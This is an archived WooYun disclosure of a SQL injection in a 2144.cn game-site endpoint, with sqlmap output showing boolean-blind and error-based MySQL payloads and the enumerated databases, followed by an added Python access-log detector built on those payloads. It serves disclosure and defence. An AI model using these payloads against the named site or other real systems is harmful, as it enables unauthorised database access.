WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --------------------- http://drop.zone.ci/
2015-09-15: Details reported to the vendor, awaiting vendor handling
2015-09-16: Vendor confirmed; details disclosed to the vendor only
2015-09-26: Details disclosed to core white hats and experts in the relevant field
2015-10-06: Details disclosed to regular white hats
2015-10-16: Details disclosed to intern white hats
2015-10-31: Details disclosed to the public
2144 Game Network (2144.cn), founded in 2006, is currently the most popular casual game site in China. For eight years we have upheld the philosophy of serving users and putting fun first, striving to provide the richest and most up-to-date game content. Today 2144 has grown into a comprehensive casual gaming platform covering mini games, browser games, mobile games and game news. 2144 now has nearly 100 million registered users, with more than 5 million players on 2144 every day, and these figures are refreshed daily at a surprising pace.
Injection point
http://act.2144.cn/week/?id=6
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 6403=6403

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [3]:
[*] act_2144_cn
[*] information_schema
[*] test

Database: act_2144_cn
[176 tables]
As above.
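The two sqlmap techniques in the report leave recognisable traces in the web server's access log: the boolean-blind tautology (AND 6403=6403) and the MySQL error-based FLOOR(RAND(0)*2) ... GROUP BY duplicate-key trick against INFORMATION_SCHEMA. The detector below is an added example (not part of the original report or the vendor's code); the log lines and the client IP are constructed to mirror the /week/?id= requests shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache/nginx-style access-log lines (not from the original report),
# shaped like the requests sqlmap issued against /week/?id=6.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Sep/2015:10:00:01 +0800] "GET /week/?id=6 HTTP/1.1" 200 5120
203.0.113.10 - - [15/Sep/2015:10:00:02 +0800] "GET /week/?id=6%20AND%206403%3D6403 HTTP/1.1" 200 5120
203.0.113.10 - - [15/Sep/2015:10:00:03 +0800] "GET /week/?id=6%20AND%20(SELECT%206081%20FROM(SELECT%20COUNT(*),CONCAT(0x717a707a71,(SELECT%20(ELT(6081%3D6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1203
"""

# Common log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures derived from the two payload types shown in the report.
SIGNATURES = [
    # "AND 6403=6403": same integer on both sides of the comparison
    ("boolean-blind tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    # FLOOR(RAND(0)*2) as a GROUP BY key forces a duplicate-entry error
    ("error-based FLOOR(RAND) GROUP BY",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S)),
    # schema enumeration via INFORMATION_SCHEMA
    ("information_schema probe", re.compile(r"\bINFORMATION_SCHEMA\.", re.I)),
]

def scan_log(text):
    """Return one finding per suspicious query parameter value in the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes values, so the regexes see the raw SQL text
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                hits = [label for label, rx in SIGNATURES if rx.search(value)]
                if hits:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                     "status": int(m["status"]), "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A 500 response paired with the error-based signature is the strongest signal, since that technique only works when the application surfaces the database error.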
- -
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2015-09-16 14:02
Thank you for your support of 2144's security work.
None yet